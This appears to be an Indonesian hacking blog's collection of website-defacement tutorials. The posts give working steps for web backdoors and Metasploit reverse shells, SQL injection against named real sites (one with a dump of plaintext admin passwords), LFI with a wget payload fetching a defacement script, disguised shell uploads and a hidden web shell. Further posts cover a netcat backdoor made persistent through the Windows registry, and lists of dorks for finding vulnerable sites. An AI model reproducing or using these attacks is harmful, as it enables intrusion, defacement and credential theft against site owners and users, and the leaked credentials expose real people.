BL4ZTERZT404
NOT FOUND!
Today : | at : | safemode : OFF| Security : Active
> / blazterzt404 / public_html / blog / post /

Dear sobat blogger blazterzt, blog blazterzt sudah aktif kembali silahkan cekout konten terbaru dari mas blazt.
name author perms com modified label
Showing posts with label Defacing. Show all posts
Showing posts with label Defacing. Show all posts

.:: Defacing - Membuat Backdoor dengan Webacoo dan Metaesploit BLAZTERROR rwxr-xr-x 0 5:16 PM

Filename .:: Defacing - Membuat Backdoor dengan Webacoo dan Metaesploit
Permission rwxrw-r--
Author BLAZTERROR
Date and Time 5:16 PM
Label
Action


Dear Sobar Blogger, kali ini mas blaz mau sharing trik nih , yaitu Hack / Deface website menggunakan WeBaCoo, WeBaCoo adalah sebuah tools CLI (Command Line) yg menjadi penghubung http antara Attacker (Penyerang) dengan Web Server yang menjadi target kita, disertai dengan pembuatan Web Backdoor tools yg berbasis Perl ini juga memberikan module agar client dapat mengakses melalui metasploit.

sekarang mari kita lihat kronologinya.

Equipments:
1. WeBacoo
2. Metasploit

pada OS Kali Linux secara default webacoo bisa kita temukan di /usr/share/webacoo/

bagi yg belum ada tools ini silahkan download terlebih dahulu
# git clone https://github.com/anestisb/WeBaCoo.git
untuk lebih jelas nya silahkan lihat gambar ini sob :


selanjutnya kita memindahkan file 'msf_webacoo_module.rb' ke directory /usr/share/metasploit-framework/modules/eksploitasi/multi/http/

agar file tersebut dapat di akses menggunakan metasploit.
# cp /usr/share/webacoo/msf_webacoo_module.rb [b]/usr/share/metasploit-framework/modules/exploits/multi/http/[/b]
untuk lebih jelas lihat gambar :


selanjutnya kita cek apakah module tersebut siap di eksekusi:
# msfconsole -q
msf > search webacoo
terlihat pada gambar diatas, module webacoo siap jalankan dan sekarang tahap pembuatan Backdoor ala WeBacoo
# webacoo -g -o /tmp/webacoo.php
-g = generate backdoor
-o = output filename
/tmp/webacoo.php = saya menyimpannya di directory /tmp/ dengan nama webacoo.php

selanjutnya kita upload ke situs korban,
dan disini backdoor saya terletak di /wp-content/uploads/webacoo.php

selanjutnya kita kembali ke Metasploit untuk mengkoneksikan Client dengan WebServer target :
msf > use exploit/linux/http/msf_webacoo_module
msf exploit(msf_webacoo_module) > show payloads
msf exploit(msf_webacoo_module) > set PAYLOAD cmd/unix/reverse_perl
msf exploit(msf_webacoo_module) > set LHOST XXX.XXX.XXX
msf exploit(msf_webacoo_module) > set LPORT 4444
msf exploit(msf_webacoo_module) > set RHOST XXX.XXX.XXX.XXX or www.TARGET.com
msf exploit(msf_webacoo_module) > set URI /wp-content/uploads/webacoo.php
msf exploit(msf_webacoo_module) > check
msf exploit(msf_webacoo_module) > exploit
PAYLOAD = payload yang saya gunakan
LHOST and LPORT = IP-Address saya dan Port Listen saya
RHOST = Situs Target
URI = Letak dimana backdoor disimpan


terlihat diatas Command Shell 1 telah tebuka.
suksess.... sekarang kita bebas di situs korban
sedikit penjelasan, pada kenyataannya kita bisa langsung terhubung dengan server korban tanpa harus melalui Metasploit menggunakan perintah:
# webacoo -t -u http://www.TARGET.com/Path/Backdoor/backdoor.php
-t = Establish remote "terminal" connection
-u = Url Backdoor



.:: Defacing - Cara deface web dengan Schemafuzz BLAZTERROR rwxr-xr-x 0 1:23 PM

Filename .:: Defacing - Cara deface web dengan Schemafuzz
Permission rwxrw-r--
Author BLAZTERROR
Date and Time 1:23 PM
Label
Action

Nah.. ini ada trik satu kali lagi yaitu SQLi dengan Schemafuzz...
ikutin langkah2 nya yah sobat blogger blazterzt,,

Bahan2 yang musti di siapin...

1.Python (http://www.python.org/ftp/python/2.5/python-2.5.msi)
2.Schemafuzz (http://rup.ee/schemafuzzy.py)
3.CMD

buka cmd masuk ke folder tempat schemafuzz.py berada...
ketikkan -> schemafuzz.py -u "url target" --perintah (list perintah ada di bawah)
1. masukkan target
saya contohkan target adalah ->
http://www.ditplb.or.id/profile.php?id=1

2.Masukkan perintah untuk mencari colom name
contoh: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1" --findcol
Maka keluar:

[+] URL: http://www.ditplb.or.id/profile.php?id=1----
[+]
Evasion Used: "+" "--"

[+] 20:36:29

[-] Proxy Not Given

[+] Attempting To find the number of columns...

[+] Testing: 0,1,2,
[+] Column Length is: 3

[+] Found null column at column #: 2

[+] SQLi URL: http://www.ditplb.or.id/profile.php?id= ... CT+0,1,2--

[+] darkc0de
URL: http://www.ditplb.or.id/profile.php?id= ... 1,darkc0de
[-] Done!











ternyata ada 2 kolom.
Berarti kita gunain http://www.ditplb.or.id/profile.php?id= ... 1,darkc0de untuk inject

3.Cari database dg command --dbs
contoh : schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de " --dbs
Maka keluar:


Code:

[+] URL: http://www.ditplb.or.id/profile.php?id= ... darkc0de--

[+] Evasion Used: "+" "--"

[+] 2032

[-] Proxy Not Given

[+] Gathering MySQL Server Configuration...

Database: t15618_plb
User: t15618_plbid@localhost

Version: 5.0.32-Debian_7etch8

[+] Showing all databases current user has access too!

[+] Number of Databases: 1

[0] t15618_plb


[-] 2039

[-] Total URL Requests 3

[-] Done



disitu udah keliatan nama DBnya??? t15618_plb

4.Cari nama table dalam database
contoh: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de " --schema -D namadatabase
Jadinya: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de " --schema -D t15618_plb
Maka keluar:
Code:

[+] URL: http://www.ditplb.or.id/profile.php?id= ... darkc0de--

[+] Evasion Used: "+" "--"

[+] 20:43:10

[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...

Database: t15618_plb

User: t15618_plbid@localhost

Version: 5.0.32-Debian_7etch8
[+] Showing Tables & Columns from database "t15618_plb"
[+] Number of Tables: 11
[Database]: t15618_plb
[table: Columns]
[0]bukutamu: id,pengirim,email,pesan
[1]frm_daftarartikel: id_daf_art,id_kat,daftarartikel,pengirim
[2]frm_detailartikel: id_det_art,id_kat,id_daf_art,detailartikel,keteran gan
[3]frm_kategori: id_kat,kategori
[4]kabupaten: ID_kab,ID_prop,Kabupaten
[5]pelatihan: ID,Pelatihan
[6]profile: ID_Profile,sinopsis,Profile
[7]propinsi: ID_prop,Propinsi
[8]sd: ID_sd,ID_1,SD,Detail
[9]sekolah: ID_sek,ID_prop,ID_kab,Sekolah,Alamat,Telp,Email
[10]user: ID_user,UserID,Password,Keterangan,Admin
[-] 20:44:39
[-] Total URL Requests 43
[-] Done


Berarti web itu mempunyai 11 tabel.... n nama kolomnya juga udah ada..... tinggal pilih deh mana yang mau ditelanjangin...hhehehe (emg cewek ) :P

5.Melihat isi dari suatu tabel n kolom
contohl :schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de " --dump -D namadatabase -T namatable -C namakolom
Jadinya :schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de " --dump -D t15618_plb -T user -C ID_user,UserID,Password,Keterangan,Admin
Maka keluar:
Code:

[+] URL: http://www.ditplb.or.id/profile.php?id= ... darkc0de--

[+] Evasion Used: "+" "--"

[+] 20:53:46

[-] Proxy Not Given

[+] Gathering MySQL Server Configuration...

Database: t15618_plb

User: t15618_plbid@localhost

Version: 5.0.32-Debian_7etch8

[+] Dumping data from database "t15618_plb" Table "user"

[+] and Column(s) ['ID_user', 'UserID', 'Password', 'Keterangan', 'Admin']

[+] Number of Rows: 13


[0] 1:direktur:direkturplbirektur PLB:Admin Direktur PLB:

[1] 2:yusuf:siplb:Achmad Yusuf:Admin Achmad Yusuf:

[2] 3:abdulmukti:fatmawatimukti: P. Abdul Mukti:Admin P. Abdul Mukti:

[3] 4:harryrogkal: ProgKAL:Admin ProgKAL:

[4] 5:samino:kurikulum:Kurikulum:Admin Kurikulum:

[5] 6:mugiarsih:manajemen:Manajemen:Admin Manajemen:

[6] 7:sutopo:kesiswaan:Kesiswaan:Admin Kesiswaan:

[7] 8:winarno:sarana:Sarana:Admin Sarana:

[8] 9:sanusi:tatausaha:Tata Usaha:Admin Tata Usaha:

[9] 10:sutji:evaluasi:Evaluasi:Admin Evaluasi:

[10] 11:thamrin:informatika:Informatika:Admin Informatika:

[11] 12:adjie:kerjasama:Kerjasama:Admin Kerjasama:

[12] 13:media:media:Media:Admin Media:

[13] No data

[-] 20:54:14

[-] Total URL Requests 15

[-] Done


Oops... kok user id n passwordnya gak di encrypt ya...........mungkin ini rejeki kita biar gak susah2 decryptnya

Cara diatas berlaku untuk sql versi 5 , untuk versi 4 gunakan perintah --fuzz untuk menemukan nama tabel n kolom
contoh:schemafuzz.py -U "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de " --fuzz

sekian tutor cupu ini moga bermanfaat. kalo ada yang kurang mohon di tambahin OK

.:: Defacing - Cara menanam Shell Lewat Upload Image di Cms Korban BLAZTERROR rwxr-xr-x 5 5:57 PM

Filename .:: Defacing - Cara menanam Shell Lewat Upload Image di Cms Korban
Permission rwxrw-r--
Author BLAZTERROR
Date and Time 5:57 PM
Label
Action
Ok Om di posting pertama ini ane bakal Kasih tutor cara tanam shell a.k.a Backdoor a.k.a PintuBelakang a.k.a Lawang dapo di website yang sudah berhasil di dapatkan username and password adminnya....

Simak baik-baik dan jangan ada yang terlewat

Bahan
1. Browser Mozilla
2. Add on tamper Data
3. shell(saya menggunakan hn-shell)
4. Rokok sampurna(Malrboro Putih juga boleh)
5. Koneksi internet (Pastinya)

Tutor
1. Saya asumsikan anda sudah berhasil masuk ke halaman admin dan sekarang carilah tempat dimana anda bisa upload file seperti gambar di bawah ini

d sini saya mencari tempat upload gambar




2. Kita tinggalkan dulu sebentar browser dan kita lihat shell yang udah d siapkan tadi dan ganti ekstensi nya menjadi .jpeg/.jpg



3. sekarang kita balik lagi ke halaman admin terus klik browse dan pilih shell yang udah d rubah ekstensi tadi trus klik open

4. sekarang buka Add-On Tamper Data Tool>>tamper data dan klik start tamper dan klik Update

5. Setelah itu akan muncul pilihan dan pilih tamper



6. lalu akan muncul seperti gambar di bawah ini dan Copy script yang saya lingkari dan copy ke notepad terus cari nama shell yang agan upload tadi lalu hapus ekstensi .jpeg/.jpeg lalu Copas ke Tempat yang tadi Lalu Klik Ok dan Pilih Abort Request



7. Setelah semuanya selesai cari shell yang sudah anda upload tadi di websitenya lalu Copy link address ny dan buka di tab baru....

8. Selamat anda Sudah berhasil Tanam shell a.k.a Backdoor a.k.a PintuBelakang a.k.a lawang dapo

Maaf kalo Post amburadul akhir kata saya ucapkan terima kasih membaca trith ini dan Semua cendol di terima

.:: Defacing - Deface Web dengan Sqlmap Linux Backtrack BLAZTERROR rwxr-xr-x 2 1:08 PM

Filename .:: Defacing - Deface Web dengan Sqlmap Linux Backtrack
Permission rwxrw-r--
Author BLAZTERROR
Date and Time 1:08 PM
Label
Action

Hack website using Backtrack (sqlmap)


In my previous tutorial I have explained what is backtrack, now in this tutorial I am going to show you how to hack website using Backtrack 5 (sqlmap). Sqlmap is a automatic sql injection tool which helps you to hack website easily. Follow the simple steps to hack website using backtrack 5 sqlmap tool.

1. Open your backtrack terminal and type cd /pentest/database/sqlmap and hit enter. Now sqlmap is open in your terminalsql map 1
2. Now find the vulnerable site. (well I already have vulnerable site)
sql map 2
3. Now type this command in the terminal and hit enter.(refer above figure)
python sqlmap.py -u http://yourvictim'slink/index.php?id=4 –dbs

4. Now you will get the database name of the website
sql map 3
Well I got the two database aj and information_schema we will select aj database.

5. Now get the tables of that database. for that you need to enter this command into your terminal and simply hit Enter.
python sqlmap.py -u http://yourvictim'slink/index.php?id=4 -D  (database name) –tables

6. Now we need to grab the tables from the aj database. paste this command bellow command and hit enter.
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -D aj –tables

sql map 4
7. Now you will get the tables list which is stored in aj database.
sql map 5

8. Now lets grab the columns from the admin table
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin --columns
sql map 7
Now we got the columns and we got username and password
9. Now lets grab the passwords of the admin
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin -U test --dump
Now we got the username and the password of the website !
sql map 9
Now just find the admin penal of the website and use proxy/vpn when you are trying to login in the website as a admin.

.:: Defacing - SQLi dengan python BLAZTERROR rwxr-xr-x 0 12:16 PM

Filename .:: Defacing - SQLi dengan python
Permission rwxrw-r--
Author BLAZTERROR
Date and Time 12:16 PM
Label
Action
Hai sobat blogger blazterzt. udah lama ga jumpa.. maaf nih baru post lagi soal. nya lagi banyak keperluan.. di sekolah jadi ga sempet ngeblog lagi.. tapi walaupun begitu saya akan share nih trik menarik... buat agan sobat blogger blazterzt yaitu teknik SQLi dengan python.

Ok mulai dari step yang pertama.. 

1. Sediakan Python dapat di cari di google dengan versi 2.7.3
2. Sqlmap. Download Disini
3. Command Promt (saya gunakan Win XP)

Ok mulai tahap pertama  

1. Download python serta Sqlmap nya
2. Extract rar Sqlmap lalu rename folder sqlmap dengan root ,
3. lalu pindahkan ke Drive C
4. Buka Cmd lalu ketikan seperti ini .
cd c:\root [ENTER]
sqlmap.py  
Seperti ini .

Mudahkan Mantab deh...

5.Nah kalo sudah di tuju direktori nya,Silahkan masukan syntax berikut ini :
sqlmap.py -u SiteVuln --dbs ENTER (Untuk mencari database)
"Maka akan jadi seperti gambar di bawah ini"
Mohon maaf , kalo gambar nya BWK :


6.Sekarang kita menggali tabel dari Dbs , " BUG " , masukan perintah :
sqlmap.py -u SiteVuln -D database nya --tables ENTER , 
Nah Munculkan banyak kan tuh , table dari Database nya
untuk lebih jelasnya Lihat gambar di bawah ini :


7.Selanjut nya adalah, menemukan kolom nya.Silahkan masukan sintaks nya lagi :
sqlmap.py -u SiteVuln -T Tabel nya --columns
,, Oke kalo udah Enter lagi , dan lihat hasil nya :


Ea kk , jangan berbahagia dulu  soalnya kita kan gaktau username + password siapa yang kita dapet "syukur2x kalo si admin yang kita dapet" kalo user biasa gimana Biar gak penasaran , lanjut ke step berikut nya

8.Melihat isi dari kolom tersebut Seperti biasa masukan sintaks lagi, sintakz nya adalah :
sqlmap.py -u SiteVuln -D Nama databasenya -T Nama tablenya -C nama kolomnya --dump
Sebagai contoh gambar di atas , saya akan mengambil username nya password nya belakangan . Setelah kita mendapatkan username nya, lakukan hal yang sama auntuk mendapatkan password dengan sintaks di atas. maka akan seperti ini jadi nya "contoh gambar" :


dan satu lagi Trouble yang biasa di hadapi yaitu mencari panel admin dan Md5,masalah tersebut bisa di atasi pake havij Takut "jika beruntung,kalo gak beruntung ya cari lagi target yang lain" .
pesen seya si sebelum di scen pakek python seken dloo pakek hevij panel adminya yaaa.

......

.:: Defacing - Defacing From Local File Inclusion Vulnerability (LFI) BLAZTERROR rwxr-xr-x 0 9:41 AM

Filename .:: Defacing - Defacing From Local File Inclusion Vulnerability (LFI)
Permission rwxrw-r--
Author BLAZTERROR
Date and Time 9:41 AM
Label
Action
Kali ini post saya ingin menjelaskan tentang bagaimana deface melalui bug Local File Inclusion atau yang sering kita sebut dengan LFI.

Sebelumnya apa itu LFI ? Menurut saya :


LFI adalah suatu celah yang dimana attacker nantinya akan bisa mengakses dan mengupload file di website tersebut dengan hanya melalui url

Langsung ke pembahasan.

1. Pertama, kita cari target dulu di google dengan dork :

inurl:.php?page=contact.php

2. Pada tutorial ini web dengan url : http://www.heng-sieng.fr/heng-sieng.php?...ontact.php menjadi tikus percobaan kita.

3. Setelah membuka url tersebut. Cobalah ganti /heng-sieng.php?page=contact.php menjadi /heng-sieng.php?page=../../../../../../../../../../../proc/self/environ
Sehingga url berubah menjadi :

http://www.heng-sieng.fr/heng-sieng.php?page=../../../../../../../../../../../proc/self/environ
Kemudian tekan enter maka tampilan nya akan seperti ini :


Sekarang target udah ready dan siap untuk kita deface. Tapi bagaimana caranya ? Oke ikutin langkah-langkah saya berikut ini :

4. Jalankan Tamper Data di Mozilla Firefox - ( Tools => Tamper Data )

Keterangan : Buat yang belum ada silahkan di install dulu add-ons nya.


 5. Start Tamper dan reload halaman target kita, maka akan muncul tampilan seperti ini :


6. Klik Tamper maka akan muncul form berikut ini seperti pada gambar :


7. Pada Label User-Agent ganti dengan script berikut ini :


<?system(‘wget [url script deface kalian]‘);?>
Contoh :

<?system(‘wget http://snpb.polibatam.ac.id/paper/teguh.php’);?>

Seperti pada gambar :

 8. Kemudian klik Ok untuk menlanjutkan. Secara otomatis halaman target kita akan mereload dengan sendirinya.

9. Sekarang kita liat script deface kita tadi. Go to address : http://[patch]/namascriptkita.php or .html

10. Sekarang cobalah buka http://www.heng-sieng.fr/teguh.php Taraaa. Website has been deface ^_^

Keterangan :

1. <?system(‘wget http://snpb.polibatam.ac.id/paper/teguh.php’);?>


Wget : Command untuk mengambil file di server lain

http://snpb.polibatam.ac.id/paper/teguh.php : URL script deface kita

teguh.php : Nama script deface kita yang berextensi .php

Sekian dari saya dan terima kasih.
 Sumber dari : Hacker Newbie dan Teguh Micro

.:: Defacing - Deface web domain Sch.id dengan txt BLAZTERROR rwxr-xr-x 0 10:24 PM

Filename .:: Defacing - Deface web domain Sch.id dengan txt
Permission rwxrw-r--
Author BLAZTERROR
Date and Time 10:24 PM
Label
Action
bageman sih cara hack site atau website dari sekolahan??ada yang tahu hehe
di sini saya hanya akan menjelaskan saja,bageman pengupload an file di site yang berdomain di sch.id ini.
yang pertama kita gunakan dork,udah tau dork kan??kaya dulu saya udah jelaskan di blog ini oke lah langsung yang mau ane jelasin di sini shc.id

di sini ada gunakan dork berikut dork nya :
- inurl:/html/siswa.php?
- inurl:/html/alumni.php?
- inurl:/html/guru.php?
coba ketikan dork tersebut dalam mesin pencari google scan-scan,kalo sudah nemu target misalkan target http://smpn23bandung.sch.id/html/guru.php?id=dbguru nah nanti kita ganti dengan perintah seperti ini
<code>editor/filemanager/connectors/test.html</> dan silakan hapus tulisan html/guru.php?id=dbguru menjadi seperti ini
http://smpn23bandung.sch.id/editor/filemanager/connectors/test.html

Siapin file txt na lalu . ganti conectors ke php.
ganti curent folder ke /file
terus upload deh.
kalo upload berhasil tanpa error terus cari deh tuh directory na.

tinggal di pamerin tuh hasilnya wkwkwk,,yang suka pamer :P yang gak suka pamer ilmu mendingan cari duit yang halal saja bang :D itu hanya maen an anak kecil yang baru belajar.dan cara ini mungkin membingungkan tapi ini hanya berbagi saja bukan untuk ajang pamer atau apalah dan
masalah hack web coba lihat web nya pake apa..
joomla, WP , dll dan cari deh turtorial exploit gimana.

kejahatan dunia ku untuk kebaikan keamananmu,dan kebodohanku hanya keingin tahuan ku mengenal dirimu wahai admin...


Sumber : bumiayu-hacker.blogspot.com

.:: Defacing - Shell b374k untuk Shell Jumping BLAZTERROR rwxr-xr-x 0 2:33 PM

Filename .:: Defacing - Shell b374k untuk Shell Jumping
Permission rwxrw-r--
Author BLAZTERROR
Date and Time 2:33 PM
Label
Action
  1. kmaren dapet dr google, source code shell b374k yg uda ada fitur jumpingnya..
shellnya awalnya sih kaya shell 404

404-Not Found

 tp klo uda masuk, itu masuk ke shell b374k.

b374k Shell
 Code Shell PHP. B374K.

SHELL b374k

di bagian ini,

Quote:// login password
$xPassword = "haniv";

itu password buat masuk shellnya.. bisa diedit sesuka kalian.
yg laen2 juga bisa diedit sih.. kaya tampilan, ato apanya lah, yg masi bisa diedit, edit aja. (ane ga mudeng sih, jd gak ngedit apa2 Mentok )

klo uda diedit. jangan lupa di enkrip dulu shell nya,sebelum diupload. biar ga telanjang kek yg diatas. buat jaga2 aja biar aman.

http://www.rightscripts.com/phpencode/ <== buat enkrip

sample shell yg uda di enkrip :
http://www.barse.com.br/wp-content/plugi...nz_404.txt

moga bermanfaat yah.

.:: Defacing - XSS Mengganti Message Error Gemscool BLAZTERROR rwxr-xr-x 0 1:22 PM

Filename .:: Defacing - XSS Mengganti Message Error Gemscool
Permission rwxrw-r--
Author BLAZTERROR
Date and Time 1:22 PM
Label
Action
Sorry mastah mastah saya newbie disini cuma bagi sedikit pikiran.. cuma buat iseng2 aja sich
maaf kalau repost

pertama tama buka


Code:
http://www.gemscool.com/login/login.php?
kemudian masukkan username & password asal asalan ntar akan jadinya
error
dan pesan yang akan keluar seperti ini


kemudian ambil code yang setelah tulisan ini

Code:
http://www.gemscool.com/login/login.php?d=
contoh hasil yang diambil
Code:
Z3Vlc3VrYSBhc2FsKytFMjAyK0lEIGF0YXUgcGFzc3dvcmQgeWFuZyBBbmRhIG1hc3Vra2FuIHNhbGFo ​KzA=&returnURL=http%3A%2F%2Fwww.gemscool.com%2Flogin%2Flogin.php%3F
kemudian hapus
Code:
&returnURL=http%3A%2F%2Fwww.gemscool.com%2Flogin%2Flogin.php%3F
kemudian kita dapatkan
Code:
Z3Vlc3VrYSBhc2FsKytFMjAyK0lEIGF0YXUgcGFzc3dvcmQgeWFuZyBBbmRhIG1hc3Vra2FuIHNhbGFo​KzA
oke hampir selesai Piktor
buka http://home.paulschou.net/tools/xlate/
untuk convert base64 ke text
setelah itu masukkan code tadi yang kita dapatkan dan convert ..!
ntar nampak hasilnya ..!


dan ganti sesuai keinginan agan
dan pasti udah tau di apain


Code:
http://www.gemscool.com/login/login.php?d=
di tambahkan dengan hasil tulisan agan
maaf kalau jelek tutornya
maxlum saya masih dibawah bawahnya newbie Bonyok

Nih hasilnya om
http://goo.gl/uYdc2
Creedits . NH Community

.:: Defacing - Tutorial Membuat Backdoor Pada System Windows BLAZTERROR rwxr-xr-x 3 10:29 PM

Filename .:: Defacing - Tutorial Membuat Backdoor Pada System Windows
Permission rwxrw-r--
Author BLAZTERROR
Date and Time 10:29 PM
Label
Action
Artikel sebelumnya ane pernah nulis tentang exploit Windows dengan mendapatkan hak akses pada komputer korban menggunakan metasploit, mungkin buat agan-agan yang pengen masuk kedalam komputer korban harus mengetik perintah-perintah yang panjang,sehingga membuat tangan menjadi pegal,lemas,dan lesu,hehe.. .Lain halnya jika kita sudah memiliki backdoor didalam komputer sikorban,bagaimana cara meletakan backdoornya langsung aja kita ketkp.

1. Download Backdoornya dan extrak filenya.


root@bt:~# wget http://downloadnetcat.com/nc11nt.zip root@bt:~# unzip nc11nt.zip

2. Lakukan Exploitasi pada komputer korban dan dapatkan meterpreternya.

use windows/smb/ms08_067_netapi
set payload windows/meterpreter/bind_tcp 
set lhost IP_KITA
set rhost IP_KORBAN
set lport 8080
exploit

3. Upload Backdoornya kekomputer sikorban.

upload nc.exe C:\\Windows\\System32\\

4. Lakukan penulisan pada registry sehingga backdoor dapat dieksekusi ketika komputer dinyalakan.

reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v 
Gilakomputer -d "C://Windows//System32//nc.exe -L -d -p 4321 -e cmd.exe"

5. Lihat hasil kelakuan kalian, hanya dengan 1 perintah komputer sudah bisa dikuasai.

nc IP_KORBAN 4321


.:: Defacing - Cara Deface Web Dengan Html Injection osComerce BLAZTERROR rwxr-xr-x 3 2:20 PM

Filename .:: Defacing - Cara Deface Web Dengan Html Injection osComerce
Permission rwxrw-r--
Author BLAZTERROR
Date and Time 2:20 PM
Label
Action
Mgkin cara Nich dah Lama  Mas Brow... Tpi masih MakJoss... Brow...
Ywdh Gx nunggu Waktu lama Lagi... Saya Udah Persiapin Nich Bahan-Bahan Ramuan Buat Deface Web.. Mas Brow..
Cekidot Dulu Disini

.::Cekidot

Tutor Nya Ada di dalem..

.:: Defacing - Step by step SQL injection Manual BLAZTERROR rwxr-xr-x 2 2:15 PM

Filename .:: Defacing - Step by step SQL injection Manual
Permission rwxrw-r--
Author BLAZTERROR
Date and Time 2:15 PM
Label
Action
My SQL Injection Step by Step
Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

===========
=step Satu:=
===========

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:
[site]/berita.php?id=100' atau
[site]/berita.php?id=-100
ehingga muncul pesan error seperti berikut (masih bnyak lagi):


==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh:


[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)...
misal:


[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--

sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--


===========
=step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..


============
=step Empat:=
============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

seumpama table yang muncul adalah "admin"


===========
=step Lima:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema. ​tables+where+table_schema=database()--

=============
= step Enam: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ​.columns+where+table_name=0xhexa--

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

http://www.v3n0m.net/ascii.htm

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ​.columns+where+table_name=0x61646D696E--

============
=step Tujuh:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

contoh kata yang keluar adalah id,username,password

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--

==============
= step Delapan:=
==============

tahap terakhir mencari halam admin atau login .


Silahkan DI pelajari Kaka 1 .


=============================
Sumber Nya .. dari NH-Community Mas Brow.....

.:: Defacing - Cara Deface Website Dengan Havij BLAZTERROR rwxr-xr-x 2 1:26 PM

Filename .:: Defacing - Cara Deface Website Dengan Havij
Permission rwxrw-r--
Author BLAZTERROR
Date and Time 1:26 PM
Label
Action
.:: Cari D0rk Nya Dulu Yah Mas Brow...

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
